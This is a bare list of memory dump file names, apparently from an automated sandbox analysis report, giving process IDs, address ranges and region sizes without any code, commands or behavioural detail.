memory/412-202-0x0000000007203000-0x0000000007204000-memory.dmpFilesize
4KB
-
memory/412-128-0x0000000007200000-0x0000000007201000-memory.dmpFilesize
4KB
-
memory/412-124-0x00000000070F0000-0x00000000070F1000-memory.dmpFilesize
4KB
-
memory/412-117-0x0000000000000000-mapping.dmp
-
memory/508-145-0x0000000008000000-0x0000000008001000-memory.dmpFilesize
4KB
-
memory/508-147-0x0000000007F40000-0x0000000007F41000-memory.dmpFilesize
4KB
-
memory/508-180-0x0000000006873000-0x0000000006874000-memory.dmpFilesize
4KB
-
memory/508-179-0x0000000009200000-0x0000000009201000-memory.dmpFilesize
4KB
-
memory/508-178-0x0000000009040000-0x0000000009041000-memory.dmpFilesize
4KB
-
memory/508-129-0x0000000006870000-0x0000000006871000-memory.dmpFilesize
4KB
-
memory/508-131-0x0000000006872000-0x0000000006873000-memory.dmpFilesize
4KB
-
memory/508-172-0x0000000008CC0000-0x0000000008CC1000-memory.dmpFilesize
4KB
-
memory/508-166-0x000000007E840000-0x000000007E841000-memory.dmpFilesize
4KB
-
memory/508-164-0x0000000008CE0000-0x0000000008D13000-memory.dmpFilesize
204KB
-
memory/508-118-0x0000000000000000-mapping.dmp
-
memory/676-209-0x000000000044412E-mapping.dmp
-
memory/676-211-0x0000000000400000-0x0000000000455000-memory.dmpFilesize
340KB
-
memory/804-154-0x0000000000000000-mapping.dmp
-
memory/1020-217-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/1020-214-0x00000000004010B8-mapping.dmp
-
memory/1184-205-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/1184-203-0x0000000000401074-mapping.dmp
-
memory/1552-230-0x0000000000000000-mapping.dmp
-
memory/1816-226-0x0000000000000000-mapping.dmp
-
memory/2060-231-0x0000000000000000-mapping.dmp
-
memory/2112-233-0x0000000000000000-mapping.dmp
-
memory/2200-225-0x0000000000000000-mapping.dmp
-
memory/2256-177-0x0000000000000000-mapping.dmp
-
memory/2284-123-0x0000000000000000-mapping.dmp
-
memory/2284-198-0x0000000000400000-0x000000000047C000-memory.dmpFilesize
496KB
-
memory/2284-196-0x00000000004466F4-mapping.dmp
-
memory/2288-142-0x0000000000000000-mapping.dmp
-
memory/2320-208-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/2320-206-0x0000000000413E10-mapping.dmp
-
memory/2880-138-0x0000000000000000-mapping.dmp
-
memory/2940-238-0x0000000004FD3000-0x0000000004FD5000-memory.dmpFilesize
8KB
-
memory/2940-234-0x0000000000000000-mapping.dmp
-
memory/2940-237-0x0000000004FD0000-0x0000000004FD1000-memory.dmpFilesize
4KB
-
memory/3064-221-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/3064-219-0x0000000000401108-mapping.dmp
-
memory/3116-227-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/3116-222-0x0000000000401000-mapping.dmp
-
memory/3128-114-0x0000000000000000-mapping.dmp
-
memory/3216-229-0x0000000000000000-mapping.dmp
-
memory/3356-216-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/3356-212-0x0000000000401000-mapping.dmp
-
memory/3536-149-0x0000000000000000-mapping.dmp
-
memory/3660-232-0x0000000000000000-mapping.dmp
-
memory/3836-132-0x0000000000000000-mapping.dmp
-
memory/4064-228-0x0000000000000000-mapping.dmp